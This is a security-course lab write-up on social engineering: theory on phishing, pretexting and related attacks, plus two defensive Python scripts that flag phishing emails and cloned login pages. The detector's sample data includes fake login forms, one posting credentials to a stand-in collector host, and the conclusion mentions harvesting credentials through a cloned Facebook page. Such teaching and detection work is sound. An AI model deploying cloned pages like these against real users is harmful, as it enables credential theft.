
LAB EXPERIMENT NO 4

AIM: Study of Social Engineering attacks

THEORY:

1. What do you understand by Social Engineering Attacks?


Solution : Social engineering attacks are a type of cyber attack that relies on psychological manipulation
rather than technical exploits. The goal of social engineering attacks is to trick people into revealing
sensitive information, performing an action, or giving access to a system or network. These attacks often
involve the impersonation of trusted individuals or organizations, such as bank employees or IT support
staff, and can take many forms, including phishing emails, pretexting, baiting, and more. Social engineering
attacks can be highly effective because they target the human element of cybersecurity, exploiting common
tendencies like trust, curiosity, and fear to bypass technical defenses and gain access to sensitive
information or systems.

2. What are different phases in social engineering attacks?


Solution : Social engineering attacks can be broken down into several distinct phases, each with its own set of
objectives and tactics. These phases are:
a) Reconnaissance: In this phase, the attacker gathers information about the target, including their personal
information, interests, and online behavior. This information is used to create a targeted attack that is more likely
to be successful.
b) Phishing: In this phase, the attacker sends a message, often an email, that appears to be from a legitimate source,
such as a bank or a trusted colleague. The message usually contains a link or attachment that, when clicked or
opened, installs malware on the target's system or prompts them to enter sensitive information.
c) Exploitation: In this phase, the attacker uses the access or information gained in the previous phases to exploit
the target's system or network. This may involve stealing sensitive data, installing additional malware, or taking
control of the target's computer or network.
d) Post-Exploitation: In this phase, the attacker maintains access to the target's system or network and continues to
gather information or carry out malicious activities. This phase can be ongoing and may involve multiple attacks
over an extended period of time.
Each phase of a social engineering attack is carefully planned and executed by the attacker, and can be difficult to
detect and prevent without proper security measures and awareness training.

3. What are the different types of Social Engineering Attacks?


a. Human-based
b. Computer-based
Solution : Social engineering attacks are aimed at exploiting human psychology, rather than technical vulnerabilities,
to trick people into divulging sensitive information or performing actions that benefit the attacker. These attacks can
be broadly categorized into two types:
A] Human-based social engineering attacks: These attacks involve direct interaction between the attacker and the
victim. Some examples of human-based social engineering attacks include:
• Phishing: In this type of attack, the attacker sends a fraudulent email or message that appears to be from a
legitimate source, such as a bank or social media platform, in an attempt to trick the victim into providing
sensitive information like login credentials, credit card numbers, or personal information.
• Pretexting: This type of attack involves creating a fake scenario or pretext to convince the victim to divulge
sensitive information or perform an action. For example, an attacker may pose as a government official or a
customer service representative to gain the victim's trust and extract sensitive information.
• Baiting: In this type of attack, the attacker entices the victim with a reward or incentive to click on a link or
download a file that contains malware or a virus.
• Tailgating: This type of attack involves an attacker following the victim into a secure area, such as a corporate
office, by pretending to be an authorized employee or contractor.

B] Computer-based social engineering attacks: These attacks use software tools and technologies to trick victims
into divulging sensitive information or performing actions that benefit the attacker. Some examples of computer-
based social engineering attacks include:
• Malware: Malware is malicious software that is designed to infiltrate a computer system or network and steal
sensitive information or perform unauthorized actions.
• Spear phishing: This type of attack is a targeted form of phishing that is aimed at specific individuals or
organizations. Attackers use personal information gathered from social media or other sources to create a
convincing message that appears to be from a trusted source.
• Watering hole attack: In this type of attack, the attacker targets a website or online platform that is
frequently visited by the victim, and infects it with malware. When the victim visits the site, they unwittingly
download the malware onto their computer system.
• Ransomware: Ransomware is a type of malware that encrypts the victim's files or data and demands payment
in exchange for the decryption key.
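The phishing and spear-phishing entries above list the signs a recipient is expected to notice: a sender that only looks like the trusted brand, a link whose visible text does not match where it really goes, urgency language, and a request for credentials. The following Python script is an added illustration (it is not part of the lab manual or of any tool mentioned in it) that turns those signs into checks and runs them over two constructed sample messages. The trusted-domain list, the brand token, the urgency word list and both sample messages are assumptions chosen for the example.

```python
"""Heuristic phishing-indicator check over constructed sample messages.

Added example for the lab discussion above; not part of the lab text.
TRUSTED_DOMAINS, BRAND_TOKENS, URGENCY_WORDS and the two samples are
assumptions made for illustration.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import urlparse

# Assumed: domains the organisation genuinely sends mail from / hosts logins on.
TRUSTED_DOMAINS = {"example-bank.com", "example.com"}
# Assumed: brand name, flattened (no dots/hyphens), used to spot lookalikes.
BRAND_TOKENS = {"examplebank"}
URGENCY_WORDS = ("urgent", "immediately", "suspended",
                 "verify your account", "within 24 hours")
URL_RE = re.compile(r"https?://([^/\s]+)", re.I)


def registrable_domain(host: str) -> str:
    """Crude eTLD+1: keep the last two labels (enough for the sample data)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def is_lookalike(domain: str) -> bool:
    """Untrusted domain that embeds the brand name, e.g. example-bank-secure.net."""
    if domain in TRUSTED_DOMAINS:
        return False
    flat = domain.replace("-", "").replace(".", "")
    return any(tok in flat for tok in BRAND_TOKENS)


def host_from_text(text: str) -> Optional[str]:
    """Hostname a reader would *see* in anchor text, or None if it is plain words."""
    m = URL_RE.search(text)
    if m:
        return m.group(1)
    m = re.fullmatch(r"\s*([a-z0-9.-]+\.[a-z]{2,})\s*", text, re.I)
    return m.group(1) if m else None


def analyse_message(msg: Dict) -> List[str]:
    """Return the sorted list of indicator names found in one parsed message.

    Constructed message schema: from_addr, reply_to (may be None), subject,
    body, links = list of (anchor_text, href) as a mail client would render them.
    """
    findings = []
    from_dom = registrable_domain(msg["from_addr"].rsplit("@", 1)[-1])
    if from_dom not in TRUSTED_DOMAINS:
        findings.append("sender-domain-untrusted")
    if is_lookalike(from_dom):
        findings.append("sender-lookalike")
    reply_to = msg.get("reply_to")
    if reply_to and registrable_domain(reply_to.rsplit("@", 1)[-1]) != from_dom:
        findings.append("reply-to-mismatch")
    for text, href in msg.get("links", []):
        href_dom = registrable_domain(urlparse(href).hostname or "")
        shown = host_from_text(text)
        if shown and registrable_domain(shown) != href_dom:
            findings.append("link-text-mismatch")   # visible URL != real target
        if is_lookalike(href_dom):
            findings.append("link-lookalike")
    lowered = (msg.get("subject", "") + " " + msg.get("body", "")).lower()
    if any(w in lowered for w in URGENCY_WORDS):
        findings.append("urgency-language")
    if re.search(r"\b(password|passcode|login credentials|card number)\b", lowered):
        findings.append("credential-request")
    return sorted(set(findings))


# Constructed sample: a spear-phishing style message with every indicator present.
PHISHING_SAMPLE = {
    "from_addr": "alerts@example-bank-secure.net",
    "reply_to": "support@mail-relay.test",
    "subject": "Urgent: your account will be suspended",
    "body": "Please verify your account within 24 hours by entering your "
            "password at the link below.",
    "links": [("https://www.example-bank.com/login",
               "https://example-bank-secure.net/login")],
}

# Constructed sample: a routine, legitimate notification.
LEGIT_SAMPLE = {
    "from_addr": "statements@example-bank.com",
    "reply_to": None,
    "subject": "Your monthly statement is ready",
    "body": "Your statement for March is available in the online banking portal.",
    "links": [("Online banking", "https://www.example-bank.com/statements")],
}

if __name__ == "__main__":
    for name, sample in (("phishing", PHISHING_SAMPLE), ("legit", LEGIT_SAMPLE)):
        print(name, analyse_message(sample))
```

Each indicator on its own is weak (a real bank also uses urgent wording occasionally), which is why the function returns the whole set rather than a verdict: a mail gateway or awareness tool would weight them, and the training point of this lab is that the lookalike sender, the mismatched link and the credential request together are what the reader should learn to notice.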

4. Explore the Social Engineering Toolkit in Kali and perform a Credential Harvester Attack (you can refer to
the manual shared earlier: Kali Linux Social Engineering)
Solution :
Conclusion : Hence, we studied Social Engineering attacks, learned the Social Engineering Toolkit in Kali, and
performed a Credential Harvester Attack by creating a cloned Facebook login page and extracting the login
information when a user enters it.
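The credential harvester in the conclusion works because a cloned login page carries the brand's look and title while being served from a host that does not belong to the brand, and it submits the typed password to wherever the clone's form points. The Python script below is an added, defender-side illustration (not part of the lab manual, of the Social Engineering Toolkit, or of any real site) of how such a page can be recognised automatically: it parses a saved login page, finds forms containing a password field, and reports a brand/host mismatch, a form that submits to another origin, a plaintext submission, or credentials sent in a GET query. The brand-to-host table, the page URLs and the three HTML samples are constructed assumptions.

```python
"""Recognising a cloned credential-harvesting login page (defender-side check).

Added example for the lab conclusion above; not part of the lab text.
BRAND_HOSTS and the sample pages are constructed assumptions for illustration.
"""
from html.parser import HTMLParser
from typing import List
from urllib.parse import urljoin, urlparse

# Assumed: brand names a genuine login page may carry in its <title>, mapped
# to the hosts that are allowed to serve that brand's login page.
BRAND_HOSTS = {"example bank": {"login.example-bank.com", "www.example-bank.com"}}


class _LoginFormCollector(HTMLParser):
    """Collects every <form> containing a password input, plus the page title."""

    def __init__(self) -> None:
        super().__init__()
        self.title = ""
        self.forms = []
        self._form = None
        self._in_title = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {"action": a.get("action", ""),
                          "method": (a.get("method") or "get").lower(),
                          "password": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None \
                and a.get("type", "").lower() == "password":
            self._form["password"] = True
        elif tag == "title":
            self._in_title = True

    def handle_data(self, data):
        if self._in_title:
            self.title += data

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None
        elif tag == "title":
            self._in_title = False


def check_login_page(page_url: str, html: str) -> List[str]:
    """Return sorted indicator names for a login page served at page_url."""
    parser = _LoginFormCollector()
    parser.feed(html)
    page_host = (urlparse(page_url).hostname or "").lower()
    title = parser.title.lower()
    findings = []
    # Brand shown in the title but page served from a host the brand does not own.
    for brand, hosts in BRAND_HOSTS.items():
        if brand in title and page_host not in hosts:
            findings.append("brand-host-mismatch")
    for form in parser.forms:
        if not form["password"]:
            continue                      # search boxes etc. are not of interest
        target = urlparse(urljoin(page_url, form["action"]))
        if (target.hostname or "").lower() != page_host:
            findings.append("cross-origin-submit")   # password leaves this origin
        if target.scheme != "https":
            findings.append("plaintext-submit")      # readable on the wire
        if form["method"] != "post":
            findings.append("credentials-in-query")  # GET puts secrets in the URL
    return sorted(set(findings))


# Constructed sample 1: clone served from a bare address (TEST-NET-1 range).
CLONE_URL = "http://192.0.2.10/"
CLONE_HTML = """<html><head><title>Example Bank - Log in</title></head>
<body><form action="login.php" method="post">
<input type="text" name="email"><input type="password" name="pass">
<input type="submit" value="Log in"></form></body></html>"""

# Constructed sample 2: the genuine page on an allowed host.
LEGIT_URL = "https://login.example-bank.com/"
LEGIT_HTML = """<html><head><title>Example Bank - Log in</title></head>
<body><form action="/session" method="post">
<input type="email" name="user"><input type="password" name="pw">
</form></body></html>"""

# Constructed sample 3: brand-prefixed lookalike host that posts elsewhere.
RELAY_URL = "https://example-bank.com.promo-login.test/signin"
RELAY_HTML = """<html><head><title>Example Bank - Log in</title></head>
<body><form action="https://collector.test/grab" method="post">
<input type="text" name="u"><input type="password" name="p"></form></body></html>"""

if __name__ == "__main__":
    for url, html in ((CLONE_URL, CLONE_HTML), (LEGIT_URL, LEGIT_HTML),
                      (RELAY_URL, RELAY_HTML)):
        print(url, check_login_page(url, html))
```

The first sample is what a lab-style harvester produces: the form posts back to the same host, so the only machine-visible giveaways are the untrusted host behind the brand title and the plain-HTTP submission, which is exactly why the awareness training in Question 2 stresses checking the address bar before typing a password.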
